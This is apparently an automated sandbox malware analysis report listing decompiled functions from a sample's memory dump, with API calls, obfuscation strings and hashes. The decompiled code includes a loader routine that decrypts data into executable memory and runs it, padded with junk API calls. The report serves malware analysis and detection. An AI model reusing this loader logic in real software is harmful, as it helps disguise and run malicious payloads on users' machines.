Opcode Fuzzy Hash: 588a7969291bafd7284a2a7db3ad013c4a42454afe158531dcc6040eaabceea6
Instruction Fuzzy Hash: AFF0451154D2E0FFE732872CBD597842F911322608F4842BAC0801A7ABCAAA437CC77F

Uniqueness

Uniqueness Score: -1.00%

Function 0040D610 Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D610() {
				void* _t1;

				_t1 = E0040D59E(0); // executed
				return _t1;
			}

0x0040d612
0x0040d618

APIs

__encode_pointer.LIBCMT ref: 0040D612

Part of subcall function 0040D59E: TlsGetValue.KERNEL32(00000000,?,0040D617,00000000,004201A6,004B9AE0,00000000,00000314,?,0040FB0A,004B9AE0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040D5B0
Part of subcall function 0040D59E: TlsGetValue.KERNEL32(00000005,?,0040D617,00000000,004201A6,004B9AE0,00000000,00000314,?,0040FB0A,004B9AE0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040D5C7
Part of subcall function 0040D59E: RtlEncodePointer.NTDLL(00000000,?,0040D617,00000000,004201A6,004B9AE0,00000000,00000314,?,0040FB0A,004B9AE0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040D605

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: b0cad501870dfb0d98f231ac1c330ed16bc6868a6629b01557d2e900d4a8fe47
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02300465 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 023004B6

Memory Dump Source

Source File: 00000005.00000002.440951446.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2300000_759F.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d51cc090fc0232b5439074e25e97c873987025f784b1db2dccd22e6ca8b212af
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 02113C79A40208EFDB01DF98C985E99BBF5AF08750F058094F9489B361D775EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00404F70 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404F70() {
				void* _t2;

				_t2 = VirtualAlloc(0,  *0x53c47c, 0x1000, 0x40); // executed
				 *0x53c1f8 = _t2;
				return _t2;
			}

0x00404f7f
0x00404f85
0x00404f8a

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,0040509A,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00404F7F

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: da08124e01b59d115f7e64f2bdbbd6b15b235f0ba4c22a1149429c6a05acecaf
Instruction ID: 05e7d9e1555686ff3f03bbb67bba69621edeffe3ba47f29a471c5e29f79e1b78
Opcode Fuzzy Hash: da08124e01b59d115f7e64f2bdbbd6b15b235f0ba4c22a1149429c6a05acecaf
Instruction Fuzzy Hash: 1EC092B1680340AFF6108B60AC46F203AA4A719B83F504011F7A4F92E8C7F46488EB28

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F90 Relevance: 86.0, APIs: 37, Strings: 12, Instructions: 299
filewindowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404F90(void* __ecx, long _a4, long _a8, int _a64, int _a68, struct _OSVERSIONINFOW _a84, char _a356, char _a364, void _a2412, char _a4460, char _a5484, short _a7520, char _a7532, signed int _a9584) {
				long _v4;
				char _v5;
				short _v10;
				int _v14;
				long _v16;
				int _v18;
				long _v20;
				int _v22;
				struct _SYSTEMTIME _v24;
				long _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t48;
				long _t53;
				intOrPtr* _t66;
				void* _t67;
				void* _t105;
				void* _t128;
				void* _t138;
				void* _t147;
				void* _t148;
				void* _t151;
				void* _t152;
				signed int _t164;

				_push(0xffffffff);
				_push(E004B5BDB);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t164 & 0xfffffff8;
				E00422420(0x2580);
				_push(_t105);
				_push(_t138);
				if( *0x53c47c == 0x48) {
					GetStringTypeExA(0, 0, 0, 0,  &_v20);
					CreateFileMappingW(0, 0, 0, 0, 0, L"yexaguvoyeh");
					GetPolyFillMode(0);
					ReportEventW(0, 0, 0, 0, 0, 0, 0, 0, 0);
					ReadEventLogW(0, 0, 0, 0, 0, 0, 0);
					SetFilePointer(0, 0,  &_v20, 0);
					_push(0);
					_push(0);
					E00407924(_t105, _t128, _t138, 0, 0);
					E004074E3( &_v16);
					E0040761C( &_v16);
					E00406634();
					E00407B52(0);
					E0040790D(0, 0);
					E00407400(0x4ba548, "0 %f", "0");
					E00405D30( &_v16,  &_a8);
					_a4 = 0x403fa8;
					_a64 = 0;
					_a68 = 0;
					_a9584 = 0xffffffff;
					E004056D0(_t105,  &_a4, _t138);
				}
				 *0x53c47c =  *0x53c47c + 0x11b1b;
				E00404F70();
				E00404E80();
				_t48 =  *0x53c47c;
				_t147 = 0;
				if(_t48 > 0) {
					do {
						 *((char*)( *0x53c1f8 + _t147)) =  *((intOrPtr*)( *0x542bd8 + _t147 + 0x11b1b));
						if(_t48 == 0xa8) {
							GetComputerNameW( &_a364,  &_v16);
							GetModuleFileNameW(0,  &_a2412, 0);
							GetVersionExW( &_a84);
							__imp__GetConsoleAliasesW( &_a5484, 0, 0);
							_v22 = 0;
							_v18 = 0;
							_v14 = 0;
							_v10 = 0;
							_v24 = 0;
							GetDateFormatW(0, 0,  &_v24, L"hewozuhisowemahuk ferosotiki jacixopiwubedik",  &_a7520, 0);
							_t48 =  *0x53c47c;
						}
						_t147 = _t147 + 1;
					} while (_t147 < _t48);
				}
				_t148 = 0;
				do {
					if(_t148 < 0xdf2) {
						SetCaretPos(0, 0);
						GetSysColorBrush(0);
					}
					GetACP();
					GetTickCount();
					_t148 = _t148 + 1;
				} while (_t148 < 0x6dcc4e);
				_t53 = 0;
				_v20 = 0;
				do {
					if( *0x53c47c + _t53 == 0xe) {
						GetCurrentProcessId();
						MoveFileA("pikenoraturedidugiyujunixowu hip", "kacecogeba begukoyutitunuyuxupicuhivehufahi");
						FormatMessageA(0, 0, 0, 0,  &_a5484, 0, 0);
						ReadConsoleA(0,  &_a2412, 0,  &_v16, 0);
						GetCompressedFileSizeA("sabusiboxozehoxicaj xexejumezutarivupafoxu modawiwejolosenamivar mimole",  &_a8);
						__imp__FindFirstVolumeW( &_a7532, 0);
						GetCurrentDirectoryA(0,  &_a356);
						SetCurrentDirectoryA(0);
						InterlockedDecrement( &_v4);
						OpenSemaphoreA(0, 0, "nehegukipokohoceviyizewabolikil");
						_t53 = _v28;
					}
					_t53 = _t53 + 1;
					_v20 = _t53;
				} while (_t53 < 0x4fe229);
				do {
					LoadMenuW(0, 0);
					CharToOemBuffA(0, 0, 0);
					CharUpperBuffA( &_a364, 0);
				} while ( &_v5 != 0);
				_t151 = 0;
				while(1) {
					GetLastError();
					if(_t151 > 0xcaaaff1) {
						break;
					}
					_t151 = _t151 + 1;
					if(_t151 < 0x1f05843) {
						continue;
					}
					break;
				}
				E00404CF0();
				_t152 = 0;
				do {
					GetLastError();
					if(_t152 == 0x26) {
						E00404DF0();
					}
					if( *0x53c47c == 0x1125) {
						WriteConsoleW(0, 0, 0,  &_a4, 0);
					}
					_t152 = _t152 + 1;
				} while (_t152 < 0x409495);
				_v20 = 0x3078f;
				do {
					if( *0x53c47c == 0x83) {
						GetWindowsDirectoryA( &_a4460, 0);
						CreateMutexW(0, 0, L"lihewupujogajozuwoyolatitebukiw sebazihuratuv yeyeye");
						VirtualFree(0, 0, 0);
						_v4("ese wayekoguf", "wabiyoduwedaketayowitagiv", "juyetunuvituwuwatomipixokisus", 0, 0, 0);
					}
					_t40 =  &_v20;
					 *_t40 = _v20 - 1;
				} while ( *_t40 != 0);
				E00404770();
				_t66 =  *0x53c1f8;
				 *0x53c470 = _t66;
				_t67 =  *_t66();
				 *[fs:0x0] = _a9584;
				return _t67;
			}

0x00404f96
0x00404f98
0x00404fa3
0x00404fa4
0x00404fb1
0x00404fbd
0x00404fc0
0x00404fc1
0x00404fd2
0x00404fe2
0x00404fe9
0x00404ff8
0x00405005
0x00405013
0x00405019
0x0040501a
0x0040501b
0x00405027
0x00405030
0x00405035
0x0040503b
0x00405041
0x00405055
0x00405062
0x0040506b
0x00405073
0x00405077
0x0040507b
0x00405086
0x00405086
0x0040508b
0x00405095
0x0040509a
0x0040509f
0x004050a4
0x004050a8
0x004050c0
0x004050d3
0x004050db
0x004050ea
0x004050f8
0x004050ff
0x0040510d
0x00405123
0x00405127
0x0040512b
0x0040512f
0x0040513d
0x00405142
0x00405148
0x00405148
0x0040514d
0x0040514e
0x004050c0
0x00405168
0x00405170
0x00405176
0x0040517c
0x00405180
0x00405180
0x00405186
0x00405188
0x0040518a
0x0040518b
0x004051ab
0x004051ad
0x004051b1
0x004051bc
0x004051c2
0x004051ce
0x004051e4
0x004051f9
0x00405205
0x00405215
0x00405225
0x0040522d
0x00405238
0x00405247
0x0040524d
0x0040524d
0x00405251
0x00405257
0x00405257
0x00405278
0x0040527c
0x00405284
0x00405290
0x00405292
0x0040529d
0x004052a0
0x004052a0
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052b1
0x00000000
0x00000000
0x00000000
0x004052b1
0x004052b3
0x004052be
0x004052c0
0x004052c0
0x004052c5
0x004052c7
0x004052c7
0x004052d6
0x004052e5
0x004052e5
0x004052e7
0x004052e8
0x00405308
0x00405310
0x0040531a
0x00405326
0x00405331
0x00405339
0x00405350
0x00405350
0x00405352
0x00405352
0x00405352
0x00405359
0x0040535e
0x00405363
0x00405368
0x00405372
0x0040537f

APIs

GetStringTypeExA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00404FD2
CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,yexaguvoyeh,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00404FE2
GetPolyFillMode.GDI32(00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00404FE9
ReportEventW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404FF8
ReadEventLogW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405005
SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405013
_fprintf.LIBCMT ref: 0040501B

Part of subcall function 00406634: __getptd.LIBCMT ref: 004081B6

Part of subcall function 00407B52: __wcstoi64.LIBCMT ref: 00407B5E

__vswprintf.LIBCMT ref: 00405055

Part of subcall function 00407400: __vsprintf_l.LIBCMT ref: 00407410

Part of subcall function 00405D30: std::_Mutex::_Mutex.LIBCPMT ref: 00405D55
Part of subcall function 00405D30: std::locale::_Init.LIBCPMT ref: 00405D73
Part of subcall function 00405D30: std::_Lockit::_Lockit.LIBCPMT ref: 00405D87

GetComputerNameW.KERNEL32 ref: 004050EA
GetModuleFileNameW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 004050F8
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,004B5BDB,000000FF), ref: 004050FF
GetConsoleAliasesW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 0040510D
GetDateFormatW.KERNEL32(00000000,00000000,?,hewozuhisowemahuk ferosotiki jacixopiwubedik,?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405142
SetCaretPos.USER32(00000000,00000000), ref: 0040517C
GetSysColorBrush.USER32(00000000), ref: 00405180
GetACP.KERNEL32(?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405186
GetTickCount.KERNEL32 ref: 00405188
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,004B5BDB,000000FF), ref: 004051C2
MoveFileA.KERNEL32 ref: 004051CE
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 004051E4
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 004051F9
GetCompressedFileSizeA.KERNEL32(sabusiboxozehoxicaj xexejumezutarivupafoxu modawiwejolosenamivar mimole,?,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405205
FindFirstVolumeW.KERNEL32(?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405215
GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405225
SetCurrentDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 0040522D
InterlockedDecrement.KERNEL32(?), ref: 00405238
OpenSemaphoreA.KERNEL32(00000000,00000000,nehegukipokohoceviyizewabolikil), ref: 00405247
LoadMenuW.USER32 ref: 0040527C
CharToOemBuffA.USER32 ref: 00405284
CharUpperBuffA.USER32(?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405290
GetLastError.KERNEL32(?,?,?,?,?,?,004B5BDB,000000FF), ref: 004052A0
GetLastError.KERNEL32(?,?,?,?,?,?,004B5BDB,000000FF), ref: 004052C0
WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 004052E5
GetWindowsDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405326
CreateMutexW.KERNEL32(00000000,00000000,lihewupujogajozuwoyolatitebukiw sebazihuratuv yeyeye,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405331
VirtualFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405339
ReplaceFileA.KERNEL32(ese wayekoguf,wabiyoduwedaketayowitagiv,juyetunuvituwuwatomipixokisus,00000000,00000000,00000000), ref: 00405350

Strings

kacecogeba begukoyutitunuyuxupicuhivehufahi, xrefs: 004051C4
juyetunuvituwuwatomipixokisus, xrefs: 00405341
)O, xrefs: 00405252
0 %f, xrefs: 0040504B
hewozuhisowemahuk ferosotiki jacixopiwubedik, xrefs: 0040511E
lihewupujogajozuwoyolatitebukiw sebazihuratuv yeyeye, xrefs: 00405328
yexaguvoyeh, xrefs: 00404FD8
sabusiboxozehoxicaj xexejumezutarivupafoxu modawiwejolosenamivar mimole, xrefs: 00405200
wabiyoduwedaketayowitagiv, xrefs: 00405346
nehegukipokohoceviyizewabolikil, xrefs: 0040523E
pikenoraturedidugiyujunixowu hip, xrefs: 004051C9
ese wayekoguf, xrefs: 0040534B

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: File$ConsoleCurrentDirectory$BuffCharCreateErrorEventFormatLastMutexNameReadstd::_$AliasesBrushCaretColorCompressedComputerCountDateDecrementFillFindFirstFreeInitInterlockedLoadLockitLockit::_MappingMenuMessageModeModuleMoveMutex::_OpenPointerPolyProcessReplaceReportSemaphoreSizeStringTickTypeUpperVersionVirtualVolumeWindowsWrite__getptd__vsprintf_l__vswprintf__wcstoi64_fprintfstd::locale::_
String ID: )O$0 %f$ese wayekoguf$hewozuhisowemahuk ferosotiki jacixopiwubedik$juyetunuvituwuwatomipixokisus$kacecogeba begukoyutitunuyuxupicuhivehufahi$lihewupujogajozuwoyolatitebukiw sebazihuratuv yeyeye$nehegukipokohoceviyizewabolikil$pikenoraturedidugiyujunixowu hip$sabusiboxozehoxicaj xexejumezutarivupafoxu modawiwejolosenamivar mimole$wabiyoduwedaketayowitagiv$yexaguvoyeh
API String ID: 3982663394-1515871809
Opcode ID: 3945d5fde8c5c5226b513d12e498d9179daca7b144e29eb65734fa7bad6f3374
Instruction ID: 2089fedea7cc187e6a387f12cca342792d34f3df890836a3b7bb9b64f1c13ac5
Opcode Fuzzy Hash: 3945d5fde8c5c5226b513d12e498d9179daca7b144e29eb65734fa7bad6f3374
Instruction Fuzzy Hash: 39A10271544340ABE310EB60DD46F9B7BA8EB88715F00452AF688B72E1D7746944CFAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041206C Relevance: 66.4, APIs: 44, Instructions: 432
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041206C(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E0041A414(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E0041A414(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E0041A414(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E0041A414(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E0041A414(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E0041A414(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E0041A414(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E0041A414(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E0041A414(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E0041A414(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E0041A414(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E0041A414(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E0041A414(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E0041A414(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E0041A414(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E0041A414(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E0041A414(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E0041A414(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E0041A414(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E0041A414(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E0041A414(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E0041A414(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E0041A414(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E0041A414(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E0041A414(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E0041A414(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E0041A414(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E0041A414(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E0041A414(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E0041A414(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E0041A414(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E0041A414(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E0041A414(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E0041A414(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E0041A414(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E0041A414(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E0041A414(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E0041A414(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E0041A414(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E0041A414(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E0041A414(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E0041A414(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E0041A414(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E0041A414(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00412074
0x00412078
0x0041207c
0x0041207f
0x00412084
0x0041208b
0x00412091
0x004120a3
0x004120b8
0x004120cd
0x004120e2
0x004120fa
0x0041210f
0x00412121
0x00412136
0x0041214e
0x00412163
0x00412178
0x0041218d
0x004121a5
0x004121ba
0x004121cf
0x004121e4
0x004121fc
0x00412211
0x00412226
0x0041223b
0x00412253
0x00412268
0x0041227d
0x00412292
0x004122aa
0x004122bf
0x004122d4
0x004122e9
0x00412301
0x00412316
0x0041232b
0x00412340
0x0041235b
0x00412373
0x0041238b
0x004123a3
0x004123be
0x004123d6
0x004123ee
0x00412406
0x00412421
0x00412439
0x00412454
0x00412467
0x00412471
0x0041247e
0x00412486
0x00412086
0x0041208a
0x0041208a

APIs

___getlocaleinfo.LIBCMT ref: 004120A3
___getlocaleinfo.LIBCMT ref: 004120B8
___getlocaleinfo.LIBCMT ref: 004120CD
___getlocaleinfo.LIBCMT ref: 004120E2
___getlocaleinfo.LIBCMT ref: 004120FA
___getlocaleinfo.LIBCMT ref: 0041210F
___getlocaleinfo.LIBCMT ref: 00412121
___getlocaleinfo.LIBCMT ref: 00412136
___getlocaleinfo.LIBCMT ref: 0041214E
___getlocaleinfo.LIBCMT ref: 00412163

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 59b95a313b3675dd95d6d490040b46bc5c098a86e56a560df9448dc498d1f5cf
Instruction ID: cb5d17f9b3fefcb68f3cef3554f0b78f9b6ea25623641dbe945dbc3f851c0c57
Opcode Fuzzy Hash: 59b95a313b3675dd95d6d490040b46bc5c098a86e56a560df9448dc498d1f5cf
Instruction Fuzzy Hash: 9DE1F3B290021DBEFF11DAE1CC49EFF77BDFB04748F04052AB215D2042EAB8AA559764

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 145
libraryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00404AB0(unsigned int* _a4) {
				short _v2048;
				char _v2052;
				struct _INPUT_RECORD _v2068;
				long _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				unsigned int _v2092;
				char _v2096;
				signed int _v2100;
				char _v2104;
				signed int _v2108;
				unsigned int _v2112;
				signed int _v2116;
				signed int _v2120;
				intOrPtr _v2132;
				unsigned int* _t78;
				intOrPtr _t82;
				signed int _t84;
				unsigned int* _t105;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t126;
				unsigned int _t134;
				intOrPtr _t136;

				_t78 = _a4;
				_t134 =  *_t78;
				_v2092 = _t134;
				_v2112 = _t78[1];
				if( *0x53c47c == 0x594) {
					LoadLibraryA("cokeparikeponovet");
				}
				_t114 =  *0x4b9188; // 0x34a68257
				_t126 =  *0x4b918c; // 0x7d5dee9c
				_v2096 = 0;
				_v2080 = _t114;
				_v2084 = _t126;
				E00404A50( &_v2096);
				_t82 =  *0x4b9190; // 0x64450d53
				_v2096 = _v2096 + 0x23f;
				_t136 =  *0x4b9194; // 0xfcbe5b87
				_v2076 = _t82;
				_v2088 = 0x20;
				while(1) {
					_v2108 = 2;
					_v2108 = _v2108 + 3;
					_t115 =  *0x53c47c;
					_t84 = _t134 << 4;
					_v2120 = _t84;
					if(_t115 == 0xc) {
						ReadConsoleInputW(0,  &_v2068, 0,  &_v2072);
						_t84 = _v2120;
						_t115 =  *0x53c47c;
					}
					_v2120 = _t84 + _v2076;
					if(_t115 != 0xfa9) {
						if(_t115 == 0x3eb) {
							 *0x53c1e4 = 0;
						}
					} else {
						 *0x53c478 = 0xedeb2e40;
					}
					_v2100 = _v2096 + _t134;
					_v2116 = _t134 >> _v2108;
					 *0x53c474 = 0xf4ea3dee;
					E00404A70( &_v2116, _t136);
					_v2120 = _v2120 ^ _v2100;
					if( *0x53c47c == 0x9e6) {
						GetProfileIntW(L"nabecote", L"zedexuvumulehaw", 0);
					}
					_v2116 = _v2116 ^ _v2120;
					if( *0x53c47c == 0x213) {
						VirtualQuery(0, 0, 0);
						GetLogicalDriveStringsW(0,  &_v2048);
					}
					_v2112 = _v2112 + 0x64;
					_v2112 = _v2112 - _v2116;
					_v2112 = _v2112 - 0x64;
					if( *0x53c47c == 0xc) {
						SetUnhandledExceptionFilter(0);
						__imp__GetVolumePathNameW(L"vovogatimaboxosululehopulecimega covagit nev",  &_v2052, 0);
					}
					E004049C0(_v2112,  &_v2120);
					_v2120 = _v2120 + _v2080;
					_v2104 = 0;
					_v2104 = _v2104 + _v2096;
					_v2104 = _v2104 + _v2112;
					_v2100 = _v2104;
					_v2116 = _v2112 >> _v2108;
					_v2116 = _v2116 + _v2084;
					_v2120 = _v2120 ^ _v2100;
					E004049D0( &_v2120, _v2116, _v2120);
					E00404A90( &_v2104, _v2132);
					E004049B0( &_v2108);
					_t72 =  &_v2100;
					 *_t72 = _v2100 - 1;
					if( *_t72 == 0) {
						break;
					}
					_t134 = _v2092;
				}
